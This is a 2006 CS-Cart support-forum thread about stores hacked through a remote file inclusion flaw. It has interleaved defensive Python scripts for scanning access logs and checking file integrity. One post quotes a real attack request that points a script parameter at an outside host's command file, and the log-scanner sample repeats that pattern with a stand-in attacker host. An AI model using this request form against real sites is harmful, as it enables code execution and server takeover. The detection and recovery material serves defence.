

Hacked?? Any ideas?

 
  • zoom4267
  • Senior Member
  • Members
  • Join Date: 27-May 06
  • 847 posts

Posted 05 June 2006 - 05:17 PM #21

I wasn't affected, but it's nice to know you guys are quick. I feel good knowing you're behind this all the way!
Lisa

http://www.skytopdesigns.com Web designs and Development

 
  • diesel
  • Member
  • Banned
  • Join Date: 19-May 06
  • 41 posts

Posted 05 June 2006 - 07:37 PM #22

Yeah, they have a huge hack problem, it's all over, and these guys get right into your system adding files and new calls etc. It's a badddd loophole. Makes me worry: once it's patched and the files are removed, can they still get in?

I have removed all files and directories associated with the hack, and when I have gone to change the password on the main account it goes to a blank page. Before, it was erroring and saying it could not find mailer... and I obviously removed whatever file they were making that call to, but now I get a blank page...

They even found my demo site we were beta testing for another site we own... that's not even live!

 
  • TonyK
  • Member
  • Members
  • Join Date: 03-Mar 06
  • 1686 posts

Posted 05 June 2006 - 08:25 PM #23

Do you have a backup copy of your files?

If I was anyone who was hacked, I would remove all the files from my server, put back an older backup, then apply the patch immediately. I would also check my user table for other admins.

This way you remove all files and don't have to guess which files; you still keep your skins, and you are now patched.
Pimpin' skins since v1.0

 
  • smoked1
  • Senior Member
  • Members
  • Join Date: 19-May 06
  • 178 posts

Posted 05 June 2006 - 08:52 PM #24

Wow, my server got raped from this. They uploaded something that was DOSing my firewall causing everything to go down. What a nightmare. I am still picking up the pieces from this.

 
  • TonyK
  • Member
  • Members
  • Join Date: 03-Mar 06
  • 1686 posts

Posted 05 June 2006 - 11:26 PM #25

Yup, happened to our server (not from CS-Cart but from another piece of software). They put up 2 phishing sites, Chase and Citibank; our ISP shut our server down instantly, and it took us DAYS to get back to normal.

Another note: I would CHANGE your MySQL username/password as well, b/c once in your box they can read your config.php, just not change it, then sneak back in later.
Pimpin' skins since v1.0

 
  • Gregh
  • Member
  • Members
  • Join Date: 14-Jan 06
  • 47 posts

Posted 06 June 2006 - 06:33 AM #26

There was a file just called install that looked half missing. I already renamed the cs-cart install; there were 2 of them.
Greg
1.3.5 sp4

 
  • ryan
  • Member
  • Members
  • Join Date: 05-Dec 05
  • 79 posts

Posted 06 June 2006 - 01:51 PM #27

Gregh,

Probably better to just delete both and re-upload a backed-up copy.

 
  • kloptops
  • Junior Member
  • Members
  • Join Date: 07-Mar 06
  • 5 posts

Posted 07 June 2006 - 05:29 AM #28

Our site was thrashed pretty severely. After injecting their own phishing sites and other crap on the server, they deleted every single file they had the permissions to alter. As a result I ended up just deleting everything and doing a fresh install (luckily I had done the upgrade last week, and was organized enough to make it easier for the next time I had to upgrade). I went through the database with a fine-tooth comb (took a good 4 hrs). I'm now just going through the site (with it showing up as being under maintenance) and making sure nothing else is screwed up.

However, all this hasn't discouraged me from the software one bit, and I'm very happy with its performance, and the response time from the cs-cart team was excellent. So thank you CS-Cart for a quality shopping cart; it makes my life that much easier. If only I could say the same about my webhost.

 
  • smoked1
  • Senior Member
  • Members
  • Join Date: 19-May 06
  • 178 posts

Posted 07 June 2006 - 06:19 AM #29

I just hope that they audit the code before the next release so that this does not happen again. From what I read this was a very easy thing to exploit. It was as simple as adding a file's location to a URL.

 
  • recedo
  • Senior Member
  • Members
  • Join Date: 24-Apr 06
  • 498 posts

Posted 07 June 2006 - 06:29 AM #30

> I just hope that they audit the code before the next release so that this does not happen again. From what I read this was a very easy thing to exploit. It was as simple as adding a file's location to a URL.


It may be something easy to exploit, but these guys are human like the rest of us. Everyone can make mistakes. I give the guys credit for a quick patch too. I think if they had someone in over the weekend they would have responded even quicker anyway.

Perhaps they could use the services of a third party to test their new releases as it's easy to miss things and let them slip through the net.

Don't think I'm trying to draw this into an argument by what I have said there though ;)

Simon

 
  • ryan
  • Member
  • Members
  • Join Date: 05-Dec 05
  • 79 posts

Posted 07 June 2006 - 03:39 PM #31

The thing is, it wasn't a new-release issue; it affected earlier versions as well, as they had a patch for version 1.3.0. Like an earlier post said, everyone makes mistakes, and they did a superfast job at getting a fix posted!

 
  • TonyK
  • Member
  • Members
  • Join Date: 03-Mar 06
  • 1686 posts

Posted 07 June 2006 - 04:21 PM #32

Just another PRIME EXAMPLE of why we all should have backups! Both database and files.

So much easier to delete everything, put a backup of db/files in place, then apply a patch, and BAM, you're back to normal.

BACKUPS, BACKUPS, BACKUPS! :-)
Pimpin' skins since v1.0

 
  • smoked1
  • Senior Member
  • Members
  • Join Date: 19-May 06
  • 178 posts

Posted 07 June 2006 - 08:59 PM #33

> Just another PRIME EXAMPLE of why we all should have backups! Both database and files.
>
> So much easier to delete everything, put a backup of db/files in place, then apply a patch, and BAM, you're back to normal.
>
> BACKUPS, BACKUPS, BACKUPS! :-)


Sometimes it's not that simple. Sometimes a server must be completely reinstalled when it has been compromised. I manage all of my own servers, so when something like this happens I have to go through everything to make sure that nothing has been touched that should not be. I understand that everyone is human and that's fine. I am just saying that they should go through all of the code and double-check all input validation.

 
  • TonyK
  • Member
  • Members
  • Join Date: 03-Mar 06
  • 1686 posts

Posted 08 June 2006 - 01:43 AM #34

So then you make a full backup of your server... I find it hard to believe you manage your own boxes but don't take backups??

And while it's not a complete answer, it does eliminate a lot of extra work if you have a good backup (i.e., recreating tpl's over, etc.).
Pimpin' skins since v1.0

 
  • smoked1
  • Senior Member
  • Members
  • Join Date: 19-May 06
  • 178 posts

Posted 08 June 2006 - 03:26 AM #35

Yes, I take complete backups every day to a DDS-4 tape drive on one server and a VXA-320 drive on another server. That is not my point. I don't know if you have ever restored a UNIX box from tape, but it's not a fun thing to do. You seem to be responding to this from a shared-host point of view. The hacker uploaded a PHP script that attacked my firewall, and when the firewall went down, I was not having a good time. I am actually a consultant for a company that sells backup devices and I am the one that handles all tech support calls. My point here is that "take backups" is not the answer, it is a precaution. The answer is to properly audit your code so that any vulnerability that is found is not something that every script kiddie on the planet can exploit. I am just glad that none of the other sites on my server/network have been compromised. As far as I am concerned I got very lucky. I don't own the company that was hacked, but I am the one ultimately responsible for all of the servers, and when this happened it caused grief for my employer because he lost money and for me because I was under the gun for 4 hours. I still think that CS-Cart is a great shopping cart and I will continue to use it, but understand that I had just purchased it about 1 week before this happened. What I told my employer is this: "Welcome to the internet, because this is the nature of it. It's a ****in war-zone out there and it's important to be properly armed". When I started here the company had no tape backups and no firewall. :)

 
  • MikeK
  • Senior Member
  • Members
  • Join Date: 26-Apr 06
  • 434 posts

Posted 08 June 2006 - 05:27 AM #36

Add my site to the list of victims. They put up a song and some Arabic text. They also put in a bit of nasty code:

"GET /Store/classes/phpmailer/class.cs_phpmailer.php?classes_dir=http%3A%2F%2F(Link: http://www.shellteam...ct=img&img=home HTTP/1.0" 200 209 "(Link: http://nvone.com/Sto.../clever.txt?cmd)http://nvone.com/Sto.../clever.txt?cmd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

Looking at this I'd say whoever did this was pretty familiar with CS-C.

Our logs say the hacker came from 212.138.47.14, although I suspect this will be a wild goose chase.

They took out whatever they could, but fortunately didn't really do that much damage. Fortunately, I've got it all backed up and they didn't get into the db's or mail, or any other site hosted on my server. Really all they wiped out was our main website, CS-C, and vTiger. CS-C was backed up to the minute, and vTiger was going to get a major upgrade anyway, and the most important data is safely tucked away in a mySQL file located elsewhere.

They also added a file called 9.php which was some kind of an ftp client or a file manager. Dunno for sure, but I got rid of it.

Darn it all, I was going to do the upgrade to 1.3.3 and install the patch tonight.

I do want to acknowledge and thank CS-C for e-mailing me about this issue well before I got hacked. I've only got myself to blame for procrastinating.

Cheers,
Mike
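The request Mike quotes is the shape of the whole attack: a parameter (`classes_dir`) that the script expects to hold a local directory is handed a URL instead. That pattern is easy to pick out of an access log after the fact. The script below is an added example written for this thread, not CS-Cart code: it parses combined-format log lines, flags any query parameter whose decoded value starts with a remote scheme, and tallies the source addresses (the list snorocket asks for later in the thread). The log lines, host names and the `return_url` allowlist entry are constructed for the example; only the vulnerable path `/Store/classes/phpmailer/class.cs_phpmailer.php` and the parameter name come from the post.

```python
"""Scan web-server access logs (Apache/nginx "combined" format) for remote
file inclusion (RFI) attempts: requests whose query parameters carry a URL
where the application expects a local path. Added example; log lines below
are constructed."""
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# combined format: host ident user [time] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Schemes that, handed to a PHP include() on a permissive build, fetch code
# from another host. Extend the tuple if your logs show other schemes.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Parameters that legitimately carry a URL in your application, so they do not
# raise false positives (assumption: adjust for your own code base).
URL_PARAM_ALLOWLIST = {"return_url"}


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_params(target):
    """Return (name, decoded_value) pairs whose value starts with a remote scheme."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name in URL_PARAM_ALLOWLIST:
            continue
        # parse_qsl decodes one layer of %-encoding; decode once more in case the
        # value was encoded twice, then normalise case before matching.
        decoded = unquote(value).strip().lower()
        if decoded.startswith(REMOTE_SCHEMES):
            hits.append((name, decoded))
    return hits


def scan(lines):
    """Return one finding per request that carries a remote URL in a parameter."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = suspicious_params(rec["target"])
        if hits:
            findings.append({
                "host": rec["host"],
                "time": rec["time"],
                "path": urlsplit(rec["target"]).path,
                # 200 on the vulnerable script means the include very likely ran;
                # 404 means the file was already removed or the patch is in place.
                "status": int(rec["status"]),
                "params": hits,
            })
    return findings


def sources(findings):
    """Count attempts per client address; a starting point for a block list."""
    return Counter(f["host"] for f in findings)


# Constructed sample: line 1 is modelled on the request quoted in the post above,
# with placeholder hosts (192.0.2.0/24, 198.51.100.0/24 and *.example are reserved for docs).
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Jun/2006:03:12:45 -0400] "GET /Store/classes/phpmailer/'
    'class.cs_phpmailer.php?classes_dir=http%3A%2F%2Fattacker.example%2Fpayload.txt%3F'
    ' HTTP/1.0" 200 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"',
    '198.51.100.7 - - [08/Jun/2006:03:13:01 -0400] "GET /Store/index.php?target='
    'categories&category_id=12 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [08/Jun/2006:03:13:09 -0400] "GET /Store/index.php?target='
    'checkout&return_url=https%3A%2F%2Fshop.example%2Fdone HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [08/Jun/2006:03:20:00 -0400] "GET /Store/classes/phpmailer/'
    'class.cs_phpmailer.php?classes_dir=HTTP%3A%2F%2Fattacker.example%2Fpayload.txt%3F'
    ' HTTP/1.0" 404 0 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for f in found:
        print(f["time"], f["host"], f["status"], f["path"], f["params"])
    print("attempts per source:", dict(sources(found)))
```

Run it over a real file with `scan(open("access_log"))`. Two things the output tells you beyond "we were hit": the status code on each attempt shows whether the include path was still live when the request arrived, and the per-source counts give you addresses to correlate with uploaded files and to block at the firewall.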

 
  • Gregh
  • Member
  • Members
  • Join Date: 14-Jan 06
  • 47 posts

Posted 08 June 2006 - 09:40 AM #37

I've just been going through our phpmailer files on the server. Should this file be in there:
dc.aout?
See attachment.
Greg
1.3.5 sp4

 
  • snorocket
  • Forum Janitor
  • Members
  • Join Date: 15-Mar 06
  • 2519 posts

Posted 08 June 2006 - 01:11 PM #38

Hi Gregh, that is some kind of virus that shouldn't be there. I'd have a close look at other files on your server and apply the security patches ASAP. If others notice certain IP addresses, maybe we can gather a list and block them; this is the reason why we need IP blocking added into CS.
SNOROCKET.COM, Now Accepting PRE-ORDERS:
Customer Service (Helpdesk) Addon for CS-Cart v4.3.1
Quote and Invoicing Addon for CS-Cart v4.3.1
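Greg's question ("should this file be in there?") is the one every post in this thread ends up asking, and eyeballing a directory listing is a poor way to answer it. A reliable answer needs a known-good baseline: a manifest of every file and its hash taken from the clean package or a trusted backup, compared against the live web root. The script below is an added example for this thread, not part of CS-Cart: it builds such a manifest, reports files that were added, modified or removed, and puts executable additions and modified files at the top of the list. The file names in `demo()` are constructed (the `9.php` name echoes Mike's post); the `EXECUTABLE_EXT` set is an assumption to adjust for what your server will actually run.

```python
"""Find what should not be in a web root by comparing it against a known-good
manifest (relative path -> SHA-256) taken from a clean install or trusted backup.
Added example with a constructed scenario; not CS-Cart code."""
import hashlib
import os
import tempfile

# Extensions the web server would execute; a new file with one of these is the
# first thing to look at (assumption: adjust to your server configuration).
EXECUTABLE_EXT = {".php", ".phtml", ".php3", ".php4", ".php5", ".cgi", ".pl", ".sh"}


def sha256_file(path):
    """Hash a file in chunks so large uploads do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map every file under root (relative, forward-slash path) to its SHA-256."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_file(full)
    return manifest


def compare(baseline, current):
    """Classify paths as added, removed or modified relative to the baseline."""
    base, cur = set(baseline), set(current)
    return {
        "added": sorted(cur - base),
        "removed": sorted(base - cur),
        "modified": sorted(p for p in base & cur if baseline[p] != current[p]),
    }


def triage(report):
    """Added files the server would execute, then modified files: look at these first."""
    added_exec = [p for p in report["added"]
                  if os.path.splitext(p)[1].lower() in EXECUTABLE_EXT]
    return added_exec + report["modified"]


def _write(root, rel, data):
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w") as fh:
        fh.write(data)


def demo():
    """Constructed scenario: a clean tree, then the kinds of change described in the thread."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "index.php", "<?php echo 'shop'; ?>\n")
        _write(root, "classes/phpmailer/class.phpmailer.php", "<?php class PHPMailer {} ?>\n")
        _write(root, "skins/default/style.css", "body { color: #000; }\n")
        baseline = build_manifest(root)  # taken from the clean install

        _write(root, "classes/phpmailer/9.php", "<?php /* dropped file */ ?>\n")  # added
        _write(root, "skins/default/logo.txt", "not executable\n")                # added
        _write(root, "index.php", "<?php echo 'defaced'; ?>\n")                   # modified
        os.remove(os.path.join(root, "skins/default/style.css"))                 # removed

        report = compare(baseline, build_manifest(root))
        return report, triage(report)


if __name__ == "__main__":
    report, first_look = demo()
    for kind in ("added", "modified", "removed"):
        print(f"{kind}: {report[kind]}")
    print("look at these first:", first_look)
```

In practice you generate the baseline from the vendor package plus your own skins and config, store it off the server (a compromised host can rewrite its own manifest), and run `compare(baseline, build_manifest("/path/to/webroot"))` after an incident and on a schedule. The "modified" list catches the case TonyK mentions where a legitimate file such as `config.php` has been altered rather than a new one dropped.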

 
  • TonyK
  • Member
  • Members
  • Join Date: 03-Mar 06
  • 1686 posts

Posted 08 June 2006 - 05:12 PM #39

Just let me know when you find a bug-free piece of software... doesn't happen.

And if you READ my response:
> "and while it's not a complete answer, it does eliminate a lot of extra work."



> Yes, I take complete backups every day to a DDS-4 tape drive on one server and a VXA-320 drive on another server. That is not my point. I don't know if you have ever restored a UNIX box from tape, but it's not a fun thing to do. You seem to be responding to this from a shared-host point of view. The hacker uploaded a PHP script that attacked my firewall, and when the firewall went down, I was not having a good time. I am actually a consultant for a company that sells backup devices and I am the one that handles all tech support calls. My point here is that "take backups" is not the answer, it is a precaution. The answer is to properly audit your code so that any vulnerability that is found is not something that every script kiddie on the planet can exploit. I am just glad that none of the other sites on my server/network have been compromised. As far as I am concerned I got very lucky. I don't own the company that was hacked, but I am the one ultimately responsible for all of the servers, and when this happened it caused grief for my employer because he lost money and for me because I was under the gun for 4 hours. I still think that CS-Cart is a great shopping cart and I will continue to use it, but understand that I had just purchased it about 1 week before this happened. What I told my employer is this: "Welcome to the internet, because this is the nature of it. It's a ****in war-zone out there and it's important to be properly armed". When I started here the company had no tape backups and no firewall. :)


Pimpin' skins since v1.0

 
  • Gregh
  • Member
  • Members
  • Join Date: 14-Jan 06
  • 47 posts

Posted 09 June 2006 - 08:59 AM #40

Yes mate, this is after the patch. I put the patch up as soon as it was released; still trying to find what shouldn't be there.
We will get there.
Greg
1.3.5 sp4